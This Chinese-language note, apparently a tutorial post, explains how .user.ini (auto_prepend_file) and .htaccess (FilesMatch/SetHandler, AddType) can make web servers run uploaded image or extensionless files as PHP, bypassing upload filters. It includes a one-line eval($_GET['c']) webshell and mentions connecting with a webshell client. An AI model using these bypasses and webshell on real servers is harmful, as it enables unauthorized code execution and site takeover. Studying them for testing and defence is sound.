.user.ini和.htaccess

.user.ini

.user.ini的使用条件

(1)nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法

php配置访问级别

不同的php配置项根据其访问级别具有不同的配置方式，根据php手册的描述，有下列四种访问级别，不同的访问级别对应的配置方式如下表：

模式 含义
PHP_INI_USER 可在用户脚本（例如 ini_set()）或 Windows 注册表（自 PHP 5.3 起）以及.user.ini中设定
PHP_INI_PERDIR 可在 php.ini、.user.ini、.htaccess或 httpd.conf中设定
PHP_INI_SYSTEM 可在php.ini或httpd.conf中设定
PHP_INI_ALL 可用以上任何方式设定

访问级别实际上是一种掩码表示方式，其中PHP_INI_USER对应1、PHP_INI_PERDIR对应2（即二进制的10）、PHP_INI_SYSTEM对应4（即二进制的100），而PHP_INI_ALL与其字面的意思相符，为所有掩码的集合，为7（即二进制的111）。实际上访问级别除了1、2、4、7以外还有3、5、6的可能性，不过PHP没有给这些访问级别定义常量。
.user.ini实际上就是一个可以由用户“自定义”的php.ini，我们能够自定义的设置是模式为除了PHP_INI_SYSTEM以外的模式（包括PHP_INI_ALL）都是可以通过.user.ini来设置的。

可以用来getshell的函数

Php配置项中有两个比较有意思的项（下图第一、四个）：

auto_append_file和auto_prepend_file，点开看看什么意思：指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。而auto_append_file类似，只是在文件后面包含。 使用方法很简单，直接写在.user.ini中：

auto_prepend_file=01.gif  //01.gif是要包含的文件。

所以，我们可以借助.user.ini轻松让所有php文件都“自动”包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。目录下有.user.ini，和包含webshell的01.gif，和正常php文件echo.php，我们可以通过包含木马文件访问到echo.php.

使用环境

某网站限制不允许上传.php文件，你便可以上传一个.user.ini，再上传一个图片马，包含起来进行getshell。不过前提是含有.user.ini的文件夹下需要有正常的php文件，否则也不能包含了。

.htaccess

利用环境

能上传php文件，但是没办法解析

利用方法

这里只是记录下如何用.htaccess进行文件上传绕过
建一个.htaccess 文件，里面的内容如下：

//FileMatch 参数即为文件名的正则匹配
<FilesMatch "pino"> 
SetHandler application/x-httpd-php
</FilesMatch>

// pino
<?php eval($_GET['c']);?>

这个时候就上传一个文件名字是pino，这个时候我们上传一个文件名字叫做pino的文件，不要后缀名，然后里面是一句话木马，用菜刀连接，可以成功！
或者可以这样书写

AddType application/x-httpd-php .jpg
// filename.jpg(图片马)
<?php eval($_GET['c']);?>

参考链接

https://www.jianshu.com/p/5a4e4c0904f5
https://www.jianshu.com/p/c674904a711e
https://wooyun.js.org/drops/user.ini文件构成的PHP后门.html